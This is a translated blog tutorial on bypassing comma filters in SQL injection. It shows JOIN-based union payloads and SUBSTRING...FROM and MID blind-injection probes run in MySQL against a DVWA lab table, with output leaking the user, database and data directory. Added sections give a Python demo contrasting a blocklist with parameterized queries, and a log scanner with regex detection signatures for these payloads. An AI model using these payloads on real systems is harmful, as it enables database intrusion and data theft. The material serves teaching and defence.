In this post the 丸趣 TV editor walks through SQL injection techniques for bypassing a comma filter in both union-based (visible) and blind injection. Most readers are probably not yet familiar with this, so the article is shared here for reference; we hope you get a lot out of it. Let's take a look.
1. Bypassing the comma in union-based injection
In a union query the format UNION SELECT 1,2,3,4,5,6,7..n is used to find which columns are displayed. The statement contains many commas, so if a WAF blocks the comma character, this union query can no longer be used.
Bypass
Replace the display-position values with the usual injection variables or with other statements:
union select 1,2,3;
union select * from ((select 1)A join (select 2)B join (select 3)C);
union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
Demonstrating the union query in the database
Everything from UNION onward is the statement we inject in the URL. This is only a demonstration; in practice, if the injected statement contains a comma it may be blocked.
mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)
Inject using JOIN so that no comma appears
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
Querying the data we actually want
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
+---------+-------+-------------------------------------------------+
| user_id | user  | password                                        |
+---------+-------+-------------------------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
|       1 | 2     | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)
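The takeaway for defenders, as an added example that is not part of the original post: blocking the comma character is a symptom-level WAF rule, and the fix that actually holds is binding the request parameter instead of pasting it into the SQL text. The script below uses Python with an in-memory SQLite database so it runs offline; the users table, the comma_blocklist_rejects rule and the two lookup functions are constructed for this demo, and the JOIN payload is the constants-only form shown above (user() and @@datadir do not exist in SQLite). It shows the blocklist rejecting the comma form, letting the JOIN form through, the concatenated query returning the injected row, and the parameterized query returning nothing for the same input.

```python
import sqlite3

# Constructed demo database (not the DVWA instance from the post): one user row.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99')"
    )
    return conn

# The WAF rule the post defeats: reject any input containing a comma.
def comma_blocklist_rejects(value):
    return "," in value

# Vulnerable pattern: the request parameter is concatenated into the SQL text.
def vulnerable_lookup(conn, user_id):
    sql = "SELECT user_id, user, password FROM users WHERE user_id = " + user_id
    return conn.execute(sql).fetchall()

# Hardened pattern: the parameter is bound, so it can only ever be a value.
def safe_lookup(conn, user_id):
    sql = "SELECT user_id, user, password FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

# The two union payloads from the post, constants only so they run on SQLite.
COMMA_PAYLOAD = "1 union select 1,2,3"
JOIN_PAYLOAD = "1 union select * from ((select 1)A join (select 2)B join (select 3)C)"

def run_demo():
    conn = make_db()
    return {
        # the comma rule catches the textbook form ...
        "comma_blocked": comma_blocklist_rejects(COMMA_PAYLOAD),
        # ... but not the JOIN form, which contains no comma at all
        "join_blocked": comma_blocklist_rejects(JOIN_PAYLOAD),
        # string concatenation: the injected (1, 2, 3) row comes back
        "vulnerable_rows": vulnerable_lookup(conn, JOIN_PAYLOAD),
        # bound parameter: the whole payload is compared as a value, no match
        "safe_rows": safe_lookup(conn, JOIN_PAYLOAD),
        # the legitimate request still works through the bound parameter
        "legit_rows": safe_lookup(conn, "1"),
    }

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The blocklist result and the parameterized result are independent: even if the WAF rule were extended to cover JOIN, the vulnerable lookup would still execute whatever the next rule misses, which is why the bound parameter, not the filter, is the control to rely on.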
2. Bypassing the comma in blind injection
The MID and SUBSTR functions extract characters from a text field:
mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro              |
+-----------------+
1 row in set (0.04 sec)
Query the ASCII code of the first character of the database user name
mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|     114 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
Blind injection: guessing the ASCII value
mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set
mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)
Bypassing the comma with the SUBSTRING function
substring(str FROM pos)
Returns the substring of str that starts at position pos
mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello                     |
+---------------------------+
1 row in set (0.04 sec)
mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello                      |
+---------------------------+
1 row in set (0.03 sec)
Injection
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
// the first character of substring(user() from 2) is o
// the ASCII code of o is 111
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)
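On the detection side, both sections above show the same lesson: a rule keyed on the comma character misses the JOIN-based union form and the SUBSTRING ... FROM blind form entirely. The script below is an added example, not part of the original post, and scans constructed access-log lines (the log format and the /app/item path are assumptions for the demo; the query strings carry the post's own comma, JOIN and SUBSTRING payloads). It URL-decodes each request target, normalizes case and whitespace, and matches on SQL structure (UNION SELECT, JOIN (SELECT, SUBSTRING/MID/SUBSTR followed by FROM, ASCII() probes) rather than on the comma.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format, not real traffic). Lines 2-4 carry
# the post's comma-based, JOIN-based and SUBSTRING ... FROM payloads; lines 1 and 5 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /app/item?id=1 HTTP/1.1" 200 4523',
    '10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /app/item?id=1+union+select+1,2,3 HTTP/1.1" 200 4610',
    '10.0.0.5 - - [10/Oct/2023:13:55:48 +0000] "GET /app/item?id=1+union+select+*+from+((select+1)A+join+(select+2)B+join+(select+3)C) HTTP/1.1" 200 4610',
    '10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /app/item?id=1+and+(ascii(substring(user()+from+2))%3D111) HTTP/1.1" 200 4523',
    '10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /app/search?q=from+here+to+there HTTP/1.1" 200 300',
]

# Assumed log layout: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signatures keyed on SQL structure, none of which depend on a comma being present.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b"),
    "join-subquery": re.compile(r"\bjoin\s*\(\s*select\b"),
    "substring-from": re.compile(r"\b(?:substring|substr|mid)\s*\(.{0,80}?\bfrom\b"),
    "ascii-probe": re.compile(r"\bascii\s*\("),
}

def normalize(target):
    """URL-decode the request target, drop inline SQL comments, collapse case and whitespace."""
    decoded = unquote_plus(target)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()

def classify(target):
    """Return the sorted list of signature names that match this request target."""
    text = normalize(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(lines):
    """Parse each log line and report the ones whose target matches at least one signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log layout
        hits = classify(m.group("target"))
        if hits:
            findings.append({"ip": m.group("ip"), "target": m.group("target"), "hits": hits})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["hits"], finding["target"])
```

The benign search for "from here to there" is not flagged because the substring-from signature requires a SUBSTRING/SUBSTR/MID call before the FROM keyword; tuning is still needed per application, but the point is that the decision is made on decoded, normalized SQL structure rather than on one character the attacker can simply avoid.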
That is all the content of "SQL injection techniques: bypassing a comma filter in union-based and blind injection". Thank you for reading! We trust you now have a basic understanding of the topic and hope it has been helpful; if you want to learn more, follow the 丸趣 TV industry news channel.